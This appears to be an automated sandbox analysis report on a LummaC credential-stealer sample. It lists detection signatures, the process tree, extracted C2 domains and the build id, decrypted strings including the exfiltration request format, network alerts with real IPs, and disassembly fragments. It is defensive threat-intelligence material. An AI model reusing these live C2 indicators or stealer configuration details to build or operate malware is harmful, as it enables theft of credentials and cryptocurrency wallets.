Edit tour

Windows Analysis Report
fuk7RfLrD3.exe

Overview

General Information

Sample name:	fuk7RfLrD3.exe renamed because original name is a hash value
Original sample name:	e6f64122e4831f8a05fbeb8c1e4a731a.exe
Analysis ID:	1586501
MD5:	e6f64122e4831f8a05fbeb8c1e4a731a
SHA1:	493e31e97867ecb2ec1d34b44ef05b5c0eced980
SHA256:	40253172672ac968aef2b9335b582755ff4a256709959c39103a67b664e62adc
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

fuk7RfLrD3.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\fuk7RfLrD3.exe" MD5: E6F64122E4831F8A05FBEB8C1E4A731A)

fuk7RfLrD3.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\fuk7RfLrD3.exe" MD5: E6F64122E4831F8A05FBEB8C1E4A731A)

D1F3.tmp.exe (PID: 7936 cmdline: "C:\Users\user~1\AppData\Local\Temp\D1F3.tmp.exe" MD5: D66791DB5C8D7BF392361E2343F7A5EA)

WerFault.exe (PID: 8096 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7936 -s 1808 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["skidjazzyric.click", "handscreamny.shop", "femalsabler.shop", "versersleep.shop", "apporholis.shop", "crowdwarek.shop", "chipdonkeruz.shop", "robinsharez.shop", "soundtappysk.shop"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.1712229018.0000000000540000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1382263686.00000000006F8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1750:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: D1F3.tmp.exe PID: 7936	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: D1F3.tmp.exe PID: 7936	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: D1F3.tmp.exe PID: 7936	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\D1F3.tmp.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\D1F3.tmp.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe, ParentCommandLine: "C:\Users\user\Desktop\fuk7RfLrD3.exe", ParentImage: C:\Users\user\Desktop\fuk7RfLrD3.exe, ParentProcessId: 7812, ParentProcessName: fuk7RfLrD3.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\D1F3.tmp.exe" , ProcessId: 7936, ProcessName: D1F3.tmp.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:33:46.077341+0100	2028371	3	Unknown Traffic	192.168.2.7	49768	104.21.80.1	443	TCP
2025-01-09T08:33:47.122891+0100	2028371	3	Unknown Traffic	192.168.2.7	49775	104.21.80.1	443	TCP
2025-01-09T08:33:48.448608+0100	2028371	3	Unknown Traffic	192.168.2.7	49785	104.21.80.1	443	TCP
2025-01-09T08:33:49.974237+0100	2028371	3	Unknown Traffic	192.168.2.7	49796	104.21.80.1	443	TCP
2025-01-09T08:33:51.197920+0100	2028371	3	Unknown Traffic	192.168.2.7	49803	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:33:46.547903+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49768	104.21.80.1	443	TCP
2025-01-09T08:33:47.629217+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49775	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:33:46.547903+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49768	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:33:47.629217+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49775	104.21.80.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:33:49.015265+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49785	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:33:43.073702+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49743	172.67.179.207	443	TCP
2025-01-09T08:33:43.923495+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49753	176.113.115.19	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: fuk7RfLrD3.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://skidjazzyric.click/apie	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE1	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEd	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click/api	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=	Avira URL Cloud: Label: malware
Source: skidjazzyric.click	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click/(	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click/apirUQ(e/	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click:443/apil	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click:443/api	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEf-	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1306978
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1306978

Found malware configuration

Source: 4.3.D1F3.tmp.exe.2120000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["skidjazzyric.click", "handscreamny.shop", "femalsabler.shop", "versersleep.shop", "apporholis.shop", "crowdwarek.shop", "chipdonkeruz.shop", "robinsharez.shop", "soundtappysk.shop"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for submitted file

Source: fuk7RfLrD3.exe	Virustotal: Detection: 40%			Perma Link
Source: fuk7RfLrD3.exe	ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: fuk7RfLrD3.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: robinsharez.shop
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: handscreamny.shop
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: chipdonkeruz.shop
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: versersleep.shop
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crowdwarek.shop
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: apporholis.shop
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: femalsabler.shop
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: soundtappysk.shop
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: skidjazzyric.click
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000004.00000003.1420112764.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Code function: 4_2_00415720 CryptUnprotectData,

4_2_00415720

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Unpacked PE file: 2.2.fuk7RfLrD3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Unpacked PE file: 4.2.D1F3.tmp.exe.400000.0.unpack

Source: fuk7RfLrD3.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49803 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 2_2_004389E2 FindFirstFileExW,

2_2_004389E2

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	4_2_0043B870
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov edx, ecx	4_2_0043B870
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov esi, ecx	4_2_00415720
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_00415720
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	4_2_00419840
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	4_2_0040A05C
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	4_2_00427070
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	4_2_0042D830
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	4_2_0043F0E0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_0041B882
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then jmp eax	4_2_004418A0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_0041B173
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	4_2_0042B170
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_0041A900
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_0041B184
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then test esi, esi	4_2_0043C9A0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [ecx], al	4_2_0041B243
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_0042EA62
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	4_2_00402210
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_0040AA32
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	4_2_00425AF0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_00428280
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	4_2_0041F2A0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ebx, eax	4_2_00405AB0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ebp, eax	4_2_00405AB0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, edx	4_2_0040B2B0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_0042EB5F
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_0042BB00
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_0041BB21
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	4_2_00441B20
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0041AB2A
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	4_2_0040C334
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]	4_2_0040C3EC
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ebx, edx	4_2_0042DBF0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then jmp ecx	4_2_0040D334
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	4_2_00422380
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	4_2_0041BBA0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	4_2_0042BBA0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_0042EBA1
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_00440BAB
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_0042EBB3
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	4_2_00441BB0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	4_2_00441C40
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_00442470
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	4_2_00426C76
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov eax, edi	4_2_0041C400
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	4_2_00417405
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	4_2_00417405
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov edx, ecx	4_2_00417405
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	4_2_00414C20
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	4_2_0044042D
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_0044042D
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0041B484
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	4_2_00427490
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	4_2_00425D6A
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_00438520
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	4_2_00442D20
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then push edi	4_2_0043C5A0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	4_2_0043C5A0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	4_2_0042B652
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0041B667
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	4_2_00418672
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00409E09
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	4_2_00407620
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	4_2_00407620
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then jmp ecx	4_2_0040CEC7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	4_2_00416ED0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	4_2_0041BEE1
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_0041AEFF
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	4_2_0040DFE2
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [eax], cl	4_2_0040DFE2
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	4_2_00408F90
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	4_2_004427B0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	4_2_020DE249
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [eax], cl	4_2_020DE249
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	4_2_020DA2C3
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	4_2_0210F347
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_020EB3DA
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_020EB3EB
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_020DA070
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov esi, ecx	4_2_020E60EF
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then jmp ecx	4_2_020DD12E
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	4_2_020E7137
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	4_2_020EC148
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_020EB166
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	4_2_020D91F7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	4_2_021121EA
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then jmp ecx	4_2_020DD59B
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov eax, edi	4_2_020EC667
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	4_2_02110694
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_02110694
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_021126D7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_020EB6EB
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	4_2_020F76F7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	4_2_020E773F
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_02108787
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	4_2_020D2477
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov byte ptr [ecx], al	4_2_020EB4AA
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_020F84E7
